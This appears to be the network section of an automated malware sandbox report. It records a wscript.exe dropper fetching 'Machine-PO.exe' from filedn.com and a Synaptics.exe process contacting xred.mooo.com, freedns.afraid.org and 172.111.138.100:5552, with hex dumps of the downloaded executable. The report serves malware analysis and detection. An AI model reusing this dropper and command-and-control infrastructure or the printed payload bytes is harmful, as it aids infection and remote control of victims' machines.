                                                                                                                                                                            Dec 30, 2024 11:49:50.012876034 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.012919903 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.013117075 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.019857883 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.019908905 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.019910097 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.019926071 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.019948959 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.019974947 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.019980907 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.020041943 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.020056963 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.020076036 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.021820068 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.021833897 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.022490025 CET49913443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.022501945 CET44349913142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.023403883 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.023447037 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.025141001 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.025723934 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.025741100 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.364088058 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.364156008 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.371149063 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.371212959 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:50.640633106 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.640710115 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:50.653101921 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:50.653290033 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.011029959 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.011065960 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012171984 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.012203932 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012574911 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.012582064 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012999058 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013011932 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013150930 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013161898 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013341904 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.013346910 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.013348103 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.013358116 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.017312050 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.017323971 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296185017 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296263933 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296291113 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296324968 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296838999 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296947956 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.296952009 CET44349916142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.296993017 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.334114075 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334167004 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334219933 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.334250927 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334275961 CET44349917142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.334296942 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.334326029 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.402703047 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.402776003 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.402797937 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.402961016 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.403655052 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.403744936 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.403779984 CET44349918142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.403827906 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:57.497447968 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497498989 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497513056 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.497564077 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.497586966 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.497611046 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.498650074 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498707056 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:57.498714924 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498730898 CET44349919142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.498775005 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:58.562264919 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:58.698951960 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:50:09.515161991 CET4975580192.168.2.869.42.215.252
                                                                                                                                                                            Dec 30, 2024 11:50:09.517601013 CET49916443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:50:09.517633915 CET49918443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:50:09.517678976 CET49917443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:50:09.517709970 CET49919443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:50:36.168809891 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:50:36.217515945 CET498795552192.168.2.8172.111.138.100

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 30, 2024 11:48:40.090106964 CET5687953192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:40.130081892 CET53568791.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:54.562416077 CET5105253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:54.569535017 CET53510521.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:55.448858023 CET5205253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:55.455827951 CET53520521.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:55.492980003 CET6273153192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:55.500417948 CET53627311.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:56.149596930 CET5980053192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:48:56.156956911 CET53598001.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:14.617022991 CET5897753192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:14.624532938 CET53589771.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:21.244957924 CET6462253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:21.252144098 CET53646221.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:25.779290915 CET5251153192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:25.786860943 CET53525111.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:31.721139908 CET6477353192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:31.728669882 CET53647731.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.514108896 CET5649253192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:38.520757914 CET53564921.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:45.482752085 CET5786953192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:45.489841938 CET53578691.1.1.1192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:57.012824059 CET4952653192.168.2.81.1.1.1
                                                                                                                                                                            Dec 30, 2024 11:49:57.020544052 CET53495261.1.1.1192.168.2.8

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 30, 2024 11:48:40.090106964 CET192.168.2.81.1.1.10xde57Standard query (0)filedn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:54.562416077 CET192.168.2.81.1.1.10x2b9eStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:55.448858023 CET192.168.2.81.1.1.10xd102Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:55.492980003 CET192.168.2.81.1.1.10xc22aStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:56.149596930 CET192.168.2.81.1.1.10xca29Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:14.617022991 CET192.168.2.81.1.1.10x14bbStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:21.244957924 CET192.168.2.81.1.1.10x9277Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:25.779290915 CET192.168.2.81.1.1.10x541eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:31.721139908 CET192.168.2.81.1.1.10xb6d8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:38.514108896 CET192.168.2.81.1.1.10x3613Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:45.482752085 CET192.168.2.81.1.1.10x9e83Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:57.012824059 CET192.168.2.81.1.1.10x812aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 30, 2024 11:48:40.130081892 CET1.1.1.1192.168.2.80xde57No error (0)filedn.com23.109.93.100A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:54.569535017 CET1.1.1.1192.168.2.80x2b9eNo error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:55.455827951 CET1.1.1.1192.168.2.80xd102Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:55.500417948 CET1.1.1.1192.168.2.80xc22aNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:48:56.156956911 CET1.1.1.1192.168.2.80xca29No error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:14.624532938 CET1.1.1.1192.168.2.80x14bbName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:21.252144098 CET1.1.1.1192.168.2.80x9277Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:25.786860943 CET1.1.1.1192.168.2.80x541eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:31.728669882 CET1.1.1.1192.168.2.80xb6d8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:38.520757914 CET1.1.1.1192.168.2.80x3613Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:45.489841938 CET1.1.1.1192.168.2.80x9e83Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:56.287873983 CET1.1.1.1192.168.2.80xf066No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:56.287873983 CET1.1.1.1192.168.2.80xf066No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 30, 2024 11:49:57.020544052 CET1.1.1.1192.168.2.80x812aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • filedn.com
                                                                                                                                                                            • docs.google.com
                                                                                                                                                                            • drive.usercontent.google.com
                                                                                                                                                                            • freedns.afraid.org

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.84971869.42.215.252808060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 30, 2024 11:48:55.506304979 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                            User-Agent: MyApp
                                                                                                                                                                            Host: freedns.afraid.org
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Dec 30, 2024 11:48:56.102370977 CET243INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:56 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.84975569.42.215.252807732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 30, 2024 11:49:14.634390116 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                            User-Agent: MyApp
                                                                                                                                                                            Host: freedns.afraid.org
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Dec 30, 2024 11:49:15.382493973 CET243INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.84970523.109.93.1004437732C:\Windows\System32\wscript.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:40 UTC352OUTGET /lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Language: en-ch
                                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: filedn.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:41 UTC348INHTTP/1.1 200 OK
                                                                                                                                                                            Server: CacheHTTPd v1.0
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:41 +0000
                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                            Content-Length: 2208256
                                                                                                                                                                            Etag: "eca8537e95f4b81f60d573f450faac9684a1d910"
                                                                                                                                                                            Expires: Mon, 30 Dec 2024 16:48:41 +0000
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Transfer-Encoding: binary
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=30
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: ff ff a1 e4 e5 49 00 85 c0 75 e9 33 c0 5a 59 59 64 89 10 68 3d 1c 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 d5 f7 ff ff 68 cc e5 49 00 e8 d3 f7 ff ff c3 e9 05 27 00 00 eb db 5b 5d c3 53 3b 05 18 e6 49 00 75 09 8b 50 04 89 15 18 e6 49 00 8b 50 04 8b 48 08 81 f9 00 10 00 00 7f 38 3b c2 75 17 85 c9 79 03 83 c1 03 c1 f9 02 a1 24 e6 49 00 33 d2 89 54 88 f4 eb 24 85 c9 79 03 83 c1 03 c1 f9 02 8b 1d 24 e6 49 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 e6 49 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 e6 49 00 75 e8 c7 05 c8 e5 49 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 b9 01 00 00 5b c3 83 fa 04 7c 0c 8b ca 81 c9 02 00 00 80 89
                                                                                                                                                                            Data Ascii: Iu3ZYYdh=@=MIthIhI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 49 00 db e2 d9 2d 24 b0 49 00 c3 90 6a 00 d9 3c 24 58 c3 90 83 ec 08 df 3c 24 9b 58 5a c3 8b c0 83 ec 0c d9 3c 24 d9 7c 24 02 9b 66 81 4c 24 02 00 0f d9 6c 24 02 df 7c 24 04 9b d9 2c 24 59 58 5a c3 8b c0 83 3d 2c e0 49 00 00 74 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40
                                                                                                                                                                            Data Ascii: I-$Ij<$X<$XZ<$|$fL$l$|$,$YXZ=,It,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 8b 4b d8 31 c0 51 c1 e9 02 49 f3 ab 59 83 e1 03 f3 aa 89 d0 89 e2 8b 4b b8 85 c9 74 01 51 8b 5b dc 85 db 74 04 8b 1b eb ed 39 d4 74 1d 5b 8b 0b 83 c3 04 8b 73 10 85 f6 74 06 8b 7b 14 89 34 07 83 c3 1c 49 75 ed 39 d4 75 e3 5f 5e 5b c3 8b c0 53 56 89 c3 89 c6 8b 36 8b 56 c0 8b 76 dc 85 d2 74 07 e8 15 18 00 00 89 d8 85 f6 75 e9 5e 5b c3 87 d1 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b
                                                                                                                                                                            Data Ascii: K1QIYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSr
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 66 3b 4a 06 74 05 83 c2 08 eb e4 83 c2 02 83 c2 02 83 c2 02 89 d1 5a 29 d1 d1 e9 e9 fc fe ff ff c3 8d 40 00 31 c9 8a 0a 42 e9 82 fe ff ff c3 90 57 50 51 89 d7 31 c0 f2 ae 75 02 f7 d1 58 01 c1 58 5f e9 69 fe ff ff c3 31 c9 85 d2 74 05 8b 4a fc d1 e9 e9 c4 fe ff ff c3 8d 40 00 53 85 d2 74 18 8b 5a fc 85 db 74 11 39 d9 7c 02 89 d9 88 08 40 92 e8 65 dd ff ff 5b c3 c6 00 00 5b c3 8b c0 85 c0 74 03 8b 40 fc c3 85 d2 74 3f 8b 08 85 c9 0f 84 7e fd ff ff 53 56 57 89 c3 89 d6 8b 79 fc 8b 56 fc 01 fa 39 ce 74 17 e8 5e 03 00 00 89 f0 8b 4e fc 8b 13 01 fa e8 20 dd ff ff 5f 5e 5b c3 e8 47 03 00 00 8b 03 89 f9 eb e8 c3 85 d2 74 61 85 c9 0f 84 3c fd ff ff 3b 10 74 5c 3b 08 74 0e 50 51 e8 2d fd ff ff 5a 58 e9 9a ff ff ff 53 56 57 89 d3 89 ce 50 8b 43 fc 03 46 fc e8 83 fd
                                                                                                                                                                            Data Ascii: f;JtZ)@1BWPQ1uXX_i1tJ@StZt9|@e[[t@t?~SVWyV9t^N _^[Gta<;t\;tPQ-ZXSVWPCF
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 24 14 0f a4 c2 04 c1 e0 04 03 04 24 13 54 24 04 83 c4 08 89 44 24 08 89 54 24 0c 45 33 db e9 66 ff ff ff 80 7c 24 10 00 0f 84 d3 00 00 00 8b 44 24 08 8b 54 24 0c f7 d8 83 d2 00 f7 da 89 44 24 08 89 54 24 0c e9 b7 00 00 00 8a 44 2e ff 8b d0 80 c2 d0 80 ea 0a 73 62 8b f8 81 e7 ff 00 00 00 83 ef 30 83 7c 24 0c 00 75 09 83 7c 24 08 00 72 49 eb 02 7c 45 81 7c 24 0c cc cc cc 0c 75 0c 81 7c 24 08 cc cc cc cc 76 04 eb 2f 7f 2d 6a 00 6a 0a 8b 44 24 10 8b 54 24 14 e8 02 fd ff ff 52 50 8b c7 99 03 04 24 13 54 24 04 83 c4 08 89 44 24 08 89 54 24 0c 45 33 db eb 90 80 7c 24 10 00 74 17 8b 44 24 08 8b 54 24 0c f7 d8 83 d2 00 f7 da 89 44 24 08 89 54 24 0c 83 7c 24 0c 00 75 05 83 7c 24 08 00 74 1b 83 7c 24 0c 00 75 0a 83 7c 24 08 00 0f 92 c0 eb 03 0f 9c c0 3a 44 24 10 74
                                                                                                                                                                            Data Ascii: $$T$D$T$E3f|$D$T$D$T$D.sb0|$u|$rI|E|$u|$v/-jjD$T$RP$T$D$T$E3|$tD$T$D$T$|$u|$t|$u|$:D$t
